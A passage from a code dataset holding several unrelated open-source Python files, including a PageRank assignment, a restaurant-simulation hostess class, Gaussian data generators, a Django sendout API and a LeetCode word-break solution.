values\")\nplt.ylabel(\"Error Values\")\nplt.show()\n#This Graph shows that there is no real pattern between Error Values and Actual Values\n#with many of them being scattered throughout this graph, However it seems that the\n#larger KM distance then the error value predicted was less then the actual value \n#and many of the smaller KM distance error values were over the actual value \n# =============================================================================\n\n","repo_name":"Flynnn99/DataScienceCA2","sub_path":"modelling.py","file_name":"modelling.py","file_ext":"py","file_size_in_byte":18270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36164820091","text":"from core.vector3 import Vec3f\nfrom core.point3 import Point3f\n\n\nclass CameraData(object):\n\n \"\"\"\n Camera Data\n Holds information about the camera data\n Will be used by the renderer interface to initialise the camera for the 3D scene viewer\n \"\"\"\n\n def __init__(self):\n self._near_clip = 5\n self._far_clip = 15\n self._focus_dist = 10\n self._fov = 45\n self._up = Vec3f(0, 0, 1)\n self._direction = Vec3f(1, 0, 0)\n self._origin = Point3f(0, 0, 0)\n\n def deserialize(self, stream):\n \"\"\"\n Deserializes all camera information from the socket stream\n :param stream: SocketStream\n :return:\n \"\"\"\n self._near_clip = stream.read_float()\n self._far_clip = stream.read_float()\n self._focus_dist = stream.read_float()\n self._fov = stream.read_float()\n self._up = stream.read_vec3f()\n self._direction = stream.read_vec3f()\n self._origin = stream.read_point3f()\n\n @property\n def near_clip(self):\n \"\"\"\n Returns the camera near clip value\n :return:\n \"\"\"\n return self._near_clip\n\n @property\n def far_clip(self):\n \"\"\"\n Returns the camera far clip value\n :return:\n \"\"\"\n return self._far_clip\n\n @property\n def focus_dist(self):\n \"\"\"\n Returns the camera focus distance\n :return:\n \"\"\"\n return self._focus_dist\n\n @property\n def fov(self):\n \"\"\"\n Returns the camera the field of view angle\n :return:\n \"\"\"\n return self._fov\n\n @property\n def up(self):\n \"\"\"\n Returns the camera up vector\n :return:\n \"\"\"\n return self._up\n\n @property\n def direction(self):\n \"\"\"\n Returns the camera viewing direction\n :return:\n \"\"\"\n return self._direction\n\n @property\n def origin(self):\n \"\"\"\n Returns the camera 3D origin world point\n :return:\n \"\"\"\n return self._origin\n\n def to_string(self):\n \"\"\"\n Returns all camera information within a string\n :return:\n \"\"\"\n return 'neaClip = {} \\n' \\\n 'farClip = {} \\n' \\\n 'focusDist = {} \\n' \\\n 'fov = {} \\n' \\\n 'up = {} \\n' \\\n 'direction = {} \\n' \\\n 'origin = {} \\n'.format(self._near_clip,\n self._far_clip,\n self._focus_dist,\n self._fov,\n self._up.to_string(),\n self._direction.to_string(),\n self._origin.to_string())\n\n\n","repo_name":"ckreisl/emca","sub_path":"model/camera_data.py","file_name":"camera_data.py","file_ext":"py","file_size_in_byte":2811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"24448622018","text":"import os\nimport random\nimport re\nimport sys\n\nDAMPING = 0.85\nSAMPLES = 10000\n\n\ndef main():\n if len(sys.argv) != 2:\n sys.exit(\"Usage: python pagerank.py corpus\")\n corpus = crawl(sys.argv[1])\n ranks = sample_pagerank(corpus, DAMPING, SAMPLES)\n print(f\"PageRank Results from Sampling (n = {SAMPLES})\")\n for page in sorted(ranks):\n print(f\" {page}: {ranks[page]:.4f}\")\n ranks = iterate_pagerank(corpus, DAMPING)\n print(f\"PageRank Results from Iteration\")\n for page in sorted(ranks):\n print(f\" {page}: {ranks[page]:.4f}\")\n\n\ndef crawl(directory):\n \"\"\"\n Parse a directory of HTML pages and check for links to other pages.\n Return a dictionary where each key is a page, and values are\n a list of all other pages in the corpus that are linked to by the page.\n \"\"\"\n pages = dict()\n\n # Extract all links from HTML files\n for filename in os.listdir(directory):\n if not filename.endswith(\".html\"):\n continue\n with open(os.path.join(directory, filename)) as f:\n contents = f.read()\n links = re.findall(r\"<a\\s+(?:[^>]*?)href=\\\"([^\\\"]*)\\\"\", contents)\n pages[filename] = set(links) - {filename}\n\n # Only include links to other pages in the corpus\n for filename in pages:\n pages[filename] = set(\n link for link in pages[filename]\n if link in pages\n )\n\n return pages\n\n\ndef transition_model(corpus, page, damping_factor):\n \"\"\"\n Return a probability distribution over which page to visit next,\n given a current page.\n\n With probability `damping_factor`, choose a link at random\n linked to by `page`. With probability `1 - damping_factor`, choose\n a link at random chosen from all pages in the corpus.\n \"\"\"\n random = 1 - damping_factor\n result = {}\n \n pages = 0\n for items in corpus:\n pages += 1\n \n links = 0\n for item in corpus[page]:\n links += 1 \n \n for item in corpus:\n result[item] = (random / pages)\n \n if item in corpus[page]:\n result[item] += (damping_factor / links)\n \n return result\n \n\ndef sample_pagerank(corpus, damping_factor, n):\n \"\"\"\n Return PageRank values for each page by sampling `n` pages\n according to transition model, starting with a page at random.\n\n Return a dictionary where keys are page names, and values are\n their estimated PageRank value (a value between 0 and 1). All\n PageRank values should sum to 1.\n \"\"\"\n result = {}\n helper = []\n for item in corpus:\n result[item] = 0\n helper.append(item) \n \n pages = 0\n for items in corpus:\n pages += 1\n \n first = random.randint(0, (pages-1))\n \n result[helper[first]] = 1\n \n current_page = helper[first]\n \n for i in range(n-1):\n \n distribution = transition_model(corpus, current_page, damping_factor)\n \n sites = []\n weights = []\n \n for item in distribution:\n sites.append(item)\n weights.append(distribution[item])\n \n Next = random.choices(sites, weights=weights, k=1)\n \n result[Next[0]] += 1\n current_page = Next[0]\n\n for item in result:\n result[item] = result[item] / n \n \n return result \n \n\ndef iterate_pagerank(corpus, damping_factor):\n \"\"\"\n Return PageRank values for each page by iteratively updating\n PageRank values until convergence.\n\n Return a dictionary where keys are page names, and values are\n their estimated PageRank value (a value between 0 and 1). All\n PageRank values should sum to 1.\n \"\"\"\n #print('corpus: ', corpus)\n total_pages = 0\n numlinks = {}\n incoming_pages = {}\n for item in corpus:\n total_pages += 1\n numlinks[item] = 0\n incoming_pages[item] = set()\n \n result = {}\n for item in corpus:\n result[item] = 1/total_pages\n \n for item in corpus:\n for item2 in corpus:\n if item in corpus[item2]:\n incoming_pages[item].add(item2)\n \n for item in corpus:\n for page in corpus[item]:\n numlinks[item] += 1\n \n # print(\"result \", result)\n # print(\"numlinks \", numlinks)\n # print(\"incoming_pages \", incoming_pages)\n \n count = 0\n while count != total_pages:\n count = 0\n for item in result:\n copy_result = result[item]\n\n second_condition = 0 \n for page in incoming_pages[item]:\n second_condition += (result[page]/numlinks[page])\n \n result[item] = ((1 - damping_factor)/total_pages) + (damping_factor * second_condition)\n \n if -0.001 < (copy_result-result[item]) < 0.001:\n count += 1\n \n sum_result = 0\n for item in result:\n sum_result += result[item]\n \n for item in result:\n result[item] = result[item] / sum_result\n \n return result\n \n\nif __name__ == \"__main__\":\n main()\n","repo_name":"freeklinssen/cs50AI","sub_path":"week_2/pagerank/pagerank.py","file_name":"pagerank.py","file_ext":"py","file_size_in_byte":5122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"74209065288","text":"\"\"\"\r\nA list is sorted in ascending order if it is empty or each item except the last one is less than or \r\nequal to its successor. Define a predicate isSorted that expects a list as an argument and returns \r\nTrue if the list is sorted, or returns False otherwise. (Hint: For a list of length 2 or greater, loop \r\nthrough the list and compare pairs of items, from left to right, and return False if the first item in \r\na pair is greater.)\r\n\"\"\"\r\ndef issorted(li,n):\r\n if n == 0:\r\n return True\r\n for i in range(n-1):\r\n if(li[i]>li[i+1]):\r\n return False\r\n return True\r\n\r\nli=[]\r\nn = int(input(\"Enter number of elements : \"))\r\nli = list(map(int,input(\"\\nEnter the numbers : \").strip().split()))[:n]\r\nprint(issorted(li,n))\r\n","repo_name":"Krishan00007/Python_practicals","sub_path":"practical_5(3).py","file_name":"practical_5(3).py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"75056291848","text":"from collections import deque\nimport asyncio\n\nclass Hostess:\n def __init__(self, restaurant):\n self.restaurant = restaurant\n self.log = self.restaurant.log\n\n self.waiting_list = {\n 'dinner': set(), 'dessert': set(), \n 'both': set(), 'none': set(),\n 'customers': {}, 'queue': deque() \n }\n self.tables = {}\n self.busy = False\n self.line_is_empty = True\n self.status = 'line_is_empty'\n\n self.db_customers = self.restaurant.db.tables['customers']\n\n def __repr__(self):\n return f\"## hostess ## restaurant_id {self.restaurant.id} - busy: {self.busy} - tables: {self.tables} - waiting_list: {self.waiting_list}\" \n def __str__(self):\n return repr(self)\n\n @classmethod\n async def create(cls, restaurant):\n return cls(restaurant)\n\n async def organize_tables(self):\n try:\n available_tables = await self.restaurant.get_available_tables()\n table_count = len(available_tables)\n label_tables = (t for t in available_tables)\n reserve_count = int(table_count * .25)\n for table_type in {'both', 'dinner', 'dessert', 'open'}:\n self.tables[table_type] = {}\n for _ in range(reserve_count):\n t_id = next(label_tables)\n self.tables[table_type][t_id] = 4\n self.tables[t_id] = table_type\n for t_id in label_tables:\n self.tables['open'][t_id] = 4\n self.tables[t_id] = 'open'\n except Exception as e:\n self.log.exception(f\"{self} error in organizing tables\")\n async def assign_customer_table(self, customer_id, table_id):\n \"\"\"\n used by hostess to direct customer to table\n \"\"\"\n if customer_id in self.waiting_list['customers']:\n # update db\n await self.db_customers.update(\n table_id=table_id,\n where={\n 'id': customer_id\n }\n )\n\n # send please_sit \n await self.restaurant.events_for_client.put(\n {\n \"name\": \"please_sit\",\n \"payload\": {\n \"customer_id\": customer_id,\n \"table_id\": table_id\n }\n }\n )\n async def run_capcacity_control(self):\n \"\"\"\n run to reduce capacity by 25 % so restaurant stays open\n \"\"\"\n # remove all customers which will order nothing, and any sit_together customers\n\n # remove members from end of end of line( waiting the least amount of time ) \n\n try:\n capacity = self.restaurant.line.line_number\n number_to_remove = int(capacity * .25)\n self.log.warning(f\"{self} capacity control started to remove {number_to_remove} customers\")\n queue = self.waiting_list['queue'].copy()\n for _ in range(number_to_remove):\n if len(self.waiting_list['none']) > 0:\n for customer in self.waiting_list['none']:\n await self.remove_customer_from_line(customer)\n number_to_remove-=1\n queue = self.waiting_list['queue'].copy()\n if number_to_remove == 0:\n break\n try:\n customer = queue.pop()\n await self.remove_customer_from_line(customer)\n except IndexError:\n break\n\n self.log.warning(f\"{self} capacity control completed\")\n except Exception as e:\n self.log.warning(f\"{self} error during capacity control\")\n\n async def remove_customer_from_line(self, customer):\n self.log.warning(f\"{self} remove_customer_from_line - customer_id: {customer}\")\n if customer in self.waiting_list['customers']:\n m_choice = self.waiting_list['customers'][customer]['meal_choice']\n self.waiting_list[m_choice].discard(customer)\n del self.waiting_list['customers'][customer]\n if customer in self.waiting_list['queue']:\n self.waiting_list['queue'].remove(customer)\n\n await self.restaurant.events_for_client.put(\n {\n \"name\": \"please_leave\",\n \"payload\": {\n \"customer_id\": customer\n }\n }\n )\n\n async def start_service(self):\n try:\n await self.organize_tables()\n while True:\n if len(self.waiting_list['customers']) == 0:\n work = await self.restaurant.work_for_hostess.get()\n else:\n try:\n work = self.restaurant.work_for_hostess.get_nowait()\n except asyncio.queues.QueueEmpty:\n work = {'event': 'queue_empty'}\n\n self.log.warning(f\"{self} - work {work}\")\n if work['event'] == 'game_over':\n break\n # events\n if self.tables:\n available_tables = await self.restaurant.get_available_tables()\n # update current availability count\n for t_id in available_tables:\n self.tables[self.tables[t_id]][t_id] = 4 - available_tables[t_id]['total']\n\n #request_table\n if work['event'] == 'request_table':\n customer = work['customer']\n meal_choice = 'none'\n if customer['will_have_dinner'] and customer['will_have_dessert']:\n meal_choice = 'both'\n elif customer['will_have_dinner']:\n meal_choice = 'dinner'\n elif customer['will_have_dessert']:\n meal_choice = 'dessert'\n else: \n pass\n self.waiting_list[meal_choice].add(customer['id'])\n self.waiting_list['customers'][customer['id']] = {\n 'sit_together': customer['sit_together']['sit_together'],\n 'meal_choice': meal_choice\n }\n self.waiting_list['queue'].append(customer['id'])\n\n self.log.warning(f\"{self} - {work}\")\n\n # line_near_capacity\n if work['event'] == 'line_near_capacity':\n self.busy = True\n self.restaurant.waiter.busy = True\n\n # trigger line control logic\n if not self.status == 'line_near_capacity':\n await self.run_capcacity_control()\n\n # line_half_capacity\n if work['event'] == 'line_half_capacity':\n self.busy = True\n self.restaurant.waiter.busy = True\n if not self.status == 'line_half_capacity':\n self.status = 'line_half_capacity'\n await self.run_capcacity_control()\n # line_partial_capacity\n if work['event'] == 'line_partial_capacity' or work['event'] == 'line_is_empty':\n self.busy = False\n self.restaurant.waiter.busy = False\n if not self.status == work['event']:\n self.status = work['event']\n\n unassigned = deque()\n while True:\n # use assign_customer_table\n assigned = False\n try:\n customer_id = self.waiting_list['queue'].popleft()\n except IndexError:\n self.waiting_list['queue'] = unassigned\n break\n if not customer_id in self.waiting_list['customers']:\n continue\n pref = self.waiting_list['customers'][customer_id]\n table_type = None\n if 'sit_together' in pref and len(pref['sit_together']) > 0:\n # check that all customers are on waiting list, else append to end of line\n missing_from_group = [c in self.waiting_list['customers'] for c in pref['sit_together']]\n if False in missing_from_group:\n unassigned.append(customer_id)\n continue\n seats = len(pref['sit_together']) + 1\n group_choices = {self.waiting_list['customers'][c]['meal_choice'] for c in pref['sit_together']}\n group_choices.add(pref['meal_choice'])\n\n if 'both' in group_choices:\n table_type = 'both'\n elif 'dinner' in group_choices:\n if 'dessert' in group_choices:\n table_type = 'both'\n else:\n table_type = 'dinner'\n else:\n table_type == 'dessert'\n \n \n group_ids = [customer_id, *pref['sit_together']]\n\n if 'none' in group_choices or table_type is None:\n # refuse service - everyone must order something\n for c_id in group_ids:\n await self.remove_customer_from_line(c_id)\n continue\n\n for t_type in {table_type, 'open'}:\n for t_id in self.tables[t_type]:\n if not t_id in available_tables:\n continue\n if self.tables[t_type][t_id] >= seats:\n # assign group to table\n for c_id in group_ids:\n await self.assign_customer_table(\n c_id, t_id\n )\n self.tables[t_type][t_id] -=seats\n assigned = True\n break\n if assigned:\n # remove group ids from wating list\n for c_id in group_ids:\n m_choice = self.waiting_list['customers'][c_id]['meal_choice']\n self.waiting_list[m_choice].discard(c_id)\n del self.waiting_list['customers'][c_id]\n if c_id in self.waiting_list['queue']:\n self.waiting_list['queue'].remove(c_id)\n break\n if not assigned:\n unassigned.append(customer_id)\n \n \"\"\"\n Non-Groups\n prefer meal_choice type tables\n\n Only allow open table usage when not busy\n for dessert only customers\n \"\"\"\n self.log.warning(f\"{self} non-group ## cid {customer_id} pref {pref}\")\n if pref['meal_choice'] == 'none':\n await self.remove_customer_from_line(customer_id)\n continue\n if self.busy and pref['meal_choice'] == 'dessert':\n table_options = {pref['meal_choice']}\n else:\n table_options = {pref['meal_choice'], 'open'}\n for t_type in table_options:\n if not t_type in self.tables:\n continue\n if assigned:\n break\n for t_id in self.tables[t_type]:\n if t_id in available_tables and self.tables[t_type][t_id] >= 1:\n await self.assign_customer_table(\n customer_id,\n t_id\n )\n self.tables[t_type][t_id] -=1\n m_choice = pref['meal_choice']\n self.waiting_list[m_choice].discard(customer_id)\n del self.waiting_list['customers'][customer_id]\n assigned = True\n break\n\n if not assigned:\n unassigned.append(customer_id)\n except Exception as e:\n self.log.exception(f\"{self} exiting\")\n self.log.warning(f\"{self} exiting\")","repo_name":"codemation/restaurant","sub_path":"restaurant/apps/restaurant/hostess.py","file_name":"hostess.py","file_ext":"py","file_size_in_byte":13046,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"5392688924","text":"from ClassificationTreeTester import ClassTree\n\nfrom automation import Tester\nimport numpy as np\n\nnn_vars_to_test = [1, 2, 4, 8, 16, 32, 64, 128, 256, 512, 1024, 2048]\nks_to_test = [3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20]\nlambda_to_test = np.power(10.,range(-30,30))\nlambda_to_test = [float(x) for x in lambda_to_test]\nclassTree_to_test = [\"gini\", \"entropy\", \"log_loss\"]\nbaseline_to_test = ['micro', 'macro', 'weighted', 'samples']\n\nall_vars_to_test1 = [nn_vars_to_test, ks_to_test, baseline_to_test]\nall_vars_to_test2 = [lambda_to_test, classTree_to_test, baseline_to_test]\n\npath_to_data = \"/Users/lucasvilsen/Desktop/DTU/MachineLearning&DataMining/Project2/StandardizedDataFrameWithNansFilled.csv\"\ntester = Tester(\"StatusClassification\", path_to_data, function_to_test = ClassTree, final_test = False, \n k = 10, cross_validation_level = 1, vars_to_test=classTree_to_test)\nprint(tester.results)","repo_name":"Apros7/DTU_MachineLearning","sub_path":"Project2/class_tree_test.py","file_name":"class_tree_test.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"6777503611","text":"from typing import List, Union\n\nimport numpy as np\nimport torch\nfrom tqdm import tqdm\n\nclass LatentGaussianMixture:\n k: int\n mu: List[list]\n cov: List[list]\n pi: List[float] # mixing proportion\n d_z: int\n d_x: int\n M: list\n B: list\n\n def __init__(self, k: int, d_z: int, d_x: int, pi: List[float],\n mu: List[list], cov: List[list],\n M: Union[list, np.ndarray],\n B: Union[list, np.ndarray],\n cov_0: Union[list, np.ndarray]):\n self.k = k\n self.d_z = d_z\n self.d_x = d_x\n self.mu = mu\n self.cov = cov\n self.pi = pi\n self.M = M\n self.B = B\n self.cov_0 = cov_0\n\n def sample(self, n: int, batch_size: int = None):\n if batch_size is None or n < batch_size:\n batch_size = n\n\n p_bar = tqdm(total=n, unit=\"data points\",\n desc=\"Generating data points from Latent Gaussian Mixture\")\n total_ = 0\n while total_ < n:\n z = np.random.randn(batch_size, self.k, self.d_z)\n z = np.einsum('nmj,mjd->nmd', z, np.asarray(self.cov)) + np.asarray(self.mu)\n pi = np.random.multinomial(1, self.pi, size=batch_size)\n z = np.sum(pi[:, :, np.newaxis] * z, axis=1)\n mu_0 = np.matmul(z, self.M) + self.B\n\n x = np.random.randn(batch_size, self.d_x)\n x = np.einsum('nj,ji->ni', x, self.cov_0) + mu_0\n\n yield x, z\n total_ += batch_size\n p_bar.update(batch_size)\n\n @property\n def k(self):\n return self.__k\n\n @k.setter\n def k(self, val):\n assert val > 1\n self.__k = val\n\n @property\n def pi(self):\n return self.__pi\n\n @pi.setter\n def pi(self, val):\n assert len(val) == self.k and np.sum(val) == 1.0\n self.__pi = val\n\n @property\n def d_z(self):\n return self.__d_z\n\n @d_z.setter\n def d_z(self, val):\n assert 1 < val < 4\n self.__d_z = val\n\n @property\n def d_x(self):\n return self.__d_x\n\n @d_x.setter\n def d_x(self, val):\n assert val > 2\n self.__d_x = val\n\n @property\n def mu(self):\n return self.__mu\n\n @mu.setter\n def mu(self, val):\n assert len(val) == self.k\n assert (all(len(com) == self.__d_z for com in val))\n self.__mu = val\n\n @property\n def cov(self):\n return self.__cov\n\n @cov.setter\n def cov(self, val):\n assert len(val) == self.k\n assert (all(len(com) == self.__d_z for com in val))\n self.__cov = val\n\n @property\n def M(self):\n return self.__M\n\n @M.setter\n def M(self, val):\n if isinstance(val, list):\n val = np.asarray(val)\n assert val.shape == (self.d_z, self.d_x)\n self.__M = val\n\n @property\n def B(self):\n return self.__B\n\n @B.setter\n def B(self, val):\n if isinstance(val, list):\n val = np.asarray(val)\n assert val.shape == (1, self.d_x)\n self.__B = val\n\n @property\n def cov_0(self):\n return self.__cov_0\n\n @cov_0.setter\n def cov_0(self, val):\n if isinstance(val, list):\n val = np.asarray(val)\n assert val.shape == (self.d_x, self.d_x)\n self.__cov_0 = torch.from_numpy(val).type(torch.float32)\n\n\nclass LatentLinearGaussian:\n \"\"\"\n Samples\n z ~ Normal(mean_z, cov_z)\n x ~ Normal(M.z + b, 1)\n where\n M = T(sigma, rho) . R_x(phi) . R_y(theta)\n with R_y, R_x rotations and T the shear mapping\n T = 1 sigma rho\n 0 1 0\n 0 0 1\n 1+sigma*rho 0 sigma\n 0 1 0\n rho 0 1\n \"\"\"\n def __init__(self, theta: int, phi: int, sigma: int, rho: int,\n mean_z: list, std_dev_z: list, std_dev_x: int = 0.1,\n use_random_lin_map: bool = False, use_hidden_variable_model: bool = True,\n data_dim: int = 6):\n \"\"\"\n\n mean_z, std_dev_z: gaussian distr. param in latent space\n std_dev_x: gaussian distr. param in data space. Here mean_x is set to zero\n\n (*) If use_hidden_variable_model is TRUE and use_random_lin_map is FALSE\n then M = T(sigma, rho) . R_x(phi) . R_y(theta) is used, where:\n theta: rotation about 'y' axis\n phi: rotation about 'x' axis\n sigma: parameter for shear mapping 1\n rho: parameter for shear mapping 2\n \"\"\"\n if use_hidden_variable_model:\n # (1) linear map to data space:\n if use_random_lin_map:\n latent_dim = len(mean_z)\n self.lin_map = np.random.randn(data_dim, latent_dim)\n else:\n latent_dim, data_dim = 3, 6\n if len(mean_z) != latent_dim or len(std_dev_z) != latent_dim:\n raise ValueError('If use_random_lin_map is False, the latent dim is fixed to 3 '\n '(i.e. len(mean_z), len(std_dev_z) should equal 3)')\n cos_phi = np.cos(phi)\n cos_theta = np.cos(theta)\n sin_phi = np.sin(phi)\n sin_theta = np.sin(theta)\n r_x = np.array([[1., 0., 0.],\n [0., cos_phi, -sin_phi],\n [0., sin_phi, cos_phi]])\n r_y = np.array([[cos_theta, 0., sin_theta],\n [0., 1., 0.],\n [-sin_theta, 0., cos_theta]])\n t =np.array([[1., sigma, rho],\n [0., 1., 0.],\n [0., 0., 1.],\n [1. + sigma*rho, 0., sigma],\n [0., 1., 0.],\n [rho, 0., 1.]])\n self.lin_map = np.matmul(t, np.matmul(r_x, r_y)) # [6, 3]\n\n # (2) Gaussian parameters for latent distribution\n self.mean_z = np.array(mean_z)[np.newaxis, :]\n self.std_dev_z = np.array(std_dev_z)[np.newaxis, :]\n\n # (3) Gaussian parameters for data distribution\n self.mean_x = np.zeros((data_dim,))[np.newaxis, :]\n self.std_dev_x = std_dev_x * np.ones((data_dim,))[np.newaxis, :]\n\n # (4) compute covariance matrix of marginal (Gaussian) density\n cov_z = np.zeros((latent_dim, latent_dim))\n np.fill_diagonal(cov_z, self.std_dev_z[0] * self.std_dev_z[0])\n self.data_cov_matrix = (std_dev_x * std_dev_x) * np.eye(data_dim) + \\\n np.matmul(self.lin_map, np.matmul(cov_z, self.lin_map.T))\n else:\n latent_dim = None\n self.lin_map = np.random.randn(data_dim, data_dim)\n self.data_cov_matrix = np.matmul(self.lin_map, self.lin_map.T)\n\n self.latent_dim = latent_dim\n self.data_dim = data_dim\n self.use_hidden_variable_model = use_hidden_variable_model\n\n def sample(self, n: int, batch_size: int = None):\n if batch_size is None or n < batch_size:\n batch_size = n\n p_bar = tqdm(total=n, unit=\"data points\",\n desc=\"Generating data points from Linear Gaussian Model\")\n total_ = 0\n while total_ < n:\n if self.use_hidden_variable_model:\n # sample latent variable\n z = np.random.randn(batch_size, self.latent_dim)\n z = self.mean_z + z * self.std_dev_z\n # sample data\n x = np.random.randn(batch_size, self.data_dim)\n x = np.matmul(z, self.lin_map.T) + self.mean_x + x * self.std_dev_x\n else:\n x = np.random.randn(batch_size, self.data_dim)\n x = np.matmul(x, self.lin_map.T)\n z = np.zeros((batch_size,2))\n yield x, z\n total_ += batch_size\n p_bar.update(batch_size)\n\n\n","repo_name":"lukasalexanderconrads/diffusion","sub_path":"src/diffusion/models/data_models.py","file_name":"data_models.py","file_ext":"py","file_size_in_byte":7962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"10182201645","text":"from __future__ import unicode_literals\n\nimport base64\nimport hashlib\n\nfrom django.db import transaction\nfrom django.http.response import JsonResponse\nfrom django.utils import timezone\nfrom oidc_provider.models import Client\nfrom werkzeug.exceptions import MethodNotAllowed, PreconditionFailed, Forbidden, NotImplemented\n\nfrom associated.models import SimpleClientCommunicationRequest, AssociatedService\nfrom library.log import rbe_logger\n\n\"\"\"\n The general API for all associated services.\n The goal is that an associated service can send messages to users on a specific aggregation level.\n\n For example it can be send to all users with a specific country, with a distance to a specific location,\n or with a skill.\n\n The email comes from the RBE network and informs why the email is send and also generates an unsubscribe\n from this client link.\n\"\"\"\n\n\n@transaction.atomic\ndef simple_sendout(request):\n \"\"\" Makes a general sendout to every user on the network\n @required - client_id\n @message_text - the text that the people should receive \"\"\"\n\n if request.method == 'POST':\n\n client_id = request.POST.get('client_id')\n\n try:\n client = Client.objects.get(client_id=client_id)\n except Client.DoesNotExist:\n rbe_logger.info(\n \"Someone called the API for language_sendout with a not known client_id={}\".format(client_id))\n return JsonResponse({'error': 'client_id not known'}, status=PreconditionFailed.code)\n\n message_text = request.POST.get('message_text')\n\n if not message_text or not (isinstance(message_text, str) or isinstance(message_text, unicode)):\n rbe_logger.info(\n \"Someone called the API for language_sendout with a not known client_id={}\".format(client_id))\n return JsonResponse({'error': 'message_text not valid'}, status=PreconditionFailed.code)\n\n if len(message_text) < 50:\n return JsonResponse({'error': 'message_text to short'}, status=PreconditionFailed.code)\n\n check_sum = request.POST.get('check_sum')\n\n if not check_sum:\n return JsonResponse({'error': 'check_sum not given'}, status=PreconditionFailed.code)\n\n # To verify that the client is really the one we check the message hash with salting by secret key\n dk = hashlib.pbkdf2_hmac('sha256', message_text, client.client_secret, 100000)\n check_sum_verification = base64.b64encode(dk).decode() # py3k-mode\n\n if check_sum != check_sum_verification:\n rbe_logger.error(\"Checksum for request failed client_id={}\".format(client.client_id))\n return JsonResponse({'error': 'check_sum not valid'}, status=Forbidden.code)\n\n # If all of those checks are passed we can actually check logical if the client is allowed to make\n # the request - we allow simplified one request every month for a given language\n\n # Lets check if there was a sendout on this language code\n\n try:\n assoc_net = AssociatedService.objects.get(client=client, enabled=True)\n except AssociatedService.DoesNotExist:\n rbe_logger.error(\n \"Client requested sendout but assoc service not existing client_id={}\".format(client.client_id))\n return JsonResponse({'error': 'Server has encountered internal precondition problems. '\n 'Please contact the team that gave you the access to this service.'},\n status=NotImplemented.code)\n\n minimal_sendout_date = timezone.datetime.now() - timezone.timedelta(days=assoc_net.sendout_day_period)\n\n # Check if there is something newer than the n-days silence period or a still pending request\n scc_qs_time = SimpleClientCommunicationRequest.objects.filter(client=client, pending=False, created__gte=minimal_sendout_date)\n scc_qs_pend = SimpleClientCommunicationRequest.objects.filter(client=client, pending=True)\n\n if scc_qs_pend.exists():\n # We cannot allow the client to send something again as there is still a job pending\n sccr = scc_qs_pend.first()\n return JsonResponse({\n 'error': 'pending_job',\n 'job_id': sccr.id,\n 'job_created': sccr.created.isoformat()\n }, status=409)\n elif scc_qs_time.exists():\n # We cannot allow the client to send something again as they need to wait more time\n sccr = scc_qs_time.first()\n time_to_send_again = timezone.timedelta(days=assoc_net.sendout_day_period) - (timezone.now() - sccr.created)\n return JsonResponse({\n 'error': 'timeout_period',\n 'job_timeout': time_to_send_again.seconds\n }, status=409)\n pass\n else:\n # Create a job as the information send out needs to be quickly checked\n # Send a test email to the admin and present how the email would look like\n sccr = SimpleClientCommunicationRequest(client=client, message_text=message_text)\n sccr.save()\n\n return JsonResponse({\n 'success': True,\n 'job_id': sccr.id,\n 'job_created': sccr.created.isoformat(),\n 'job_description': 'The message was accepted and wil be checked. Once released it will be send to the desired group of users'\n }, status=202)\n\n else:\n return JsonResponse({'success': False}, status=MethodNotAllowed.code)\n","repo_name":"sheepsy90/django-rbe","sub_path":"associated/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":5565,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"16"} +{"seq_id":"12132556365","text":"# 140. Word Break II\n# https://leetcode.com/problems/word-break-ii\nimport unittest\n\n\nclass Solution:\n def __init__(self):\n self.memo = {}\n\n def _word_break_helper(self, s, word_dic, start):\n if start in self.memo:\n return self.memo[start]\n res = []\n if start == len(s):\n res.append('')\n for end in range(start + 1, len(s) + 1):\n sub_str = s[start:end]\n if sub_str in word_dic:\n sub_rest = self._word_break_helper(s, word_dic, end)\n for sub in sub_rest:\n sub = sub_str + (' ' if sub != '' else '') + sub\n res.append(sub)\n self.memo[start] = res\n return res\n\n def wordBreak(self, s, wordDict):\n '''\n :type s: str\n :type wordDict: List[str]\n :rtype: List[str]\n '''\n if not s:\n return []\n self.memo = {}\n result = self._word_break_helper(s, set(wordDict), 0)\n return result\n\n\nclass TestWordBreak(unittest.TestCase):\n def test(self):\n sol = Solution()\n self.assertEqual(\n sol.wordBreak('catsanddog', ['cat', 'cats', 'and', 'sand', 'dog']),\n [\n 'cat sand dog',\n 'cats and dog'\n ]\n )\n self.assertEqual(\n sol.wordBreak('pineapplepenapple', ['apple', 'pen', 'applepen', 'pine', 'pineapple']),\n [\n 'pine apple pen apple',\n 'pine applepen apple',\n 'pineapple pen apple',\n ]\n )\n self.assertEqual(\n sol.wordBreak('catsandog', ['cats', 'dog', 'sand', 'and', 'cat']),\n []\n )\n\n\nif __name__ == '__main__':\n unittest.TestCase()\n","repo_name":"smartdolphin/python-algorithm","sub_path":"problems/word_break_ii.py","file_name":"word_break_ii.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"4109389454","text":"\"\"\"\nTrain model with argument setting\n\"\"\"\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torchvision.transforms as transforms\nfrom torchvision.utils import make_grid\nfrom torch.autograd import Variable\nfrom torch.optim.lr_scheduler import MultiStepLR\nfrom torch.utils.data import DataLoader\nimport torch.nn.functional as F\n\nfrom datetime import datetime\nfrom math import ceil\nimport os\nimport os.path as osp\nimport pickle\nimport numpy as np\nimport cv2\nimport lmdb\nimport torch\nimport random\nimport copy\nimport utils\nfrom model import STSR, RefineLayer\n\n# Superslomo module\nimport IT_arch.superslomo as superslomo\n\n# Dataset & loss & optimizer\nfrom dataset import vimeo90k\nfrom radam import 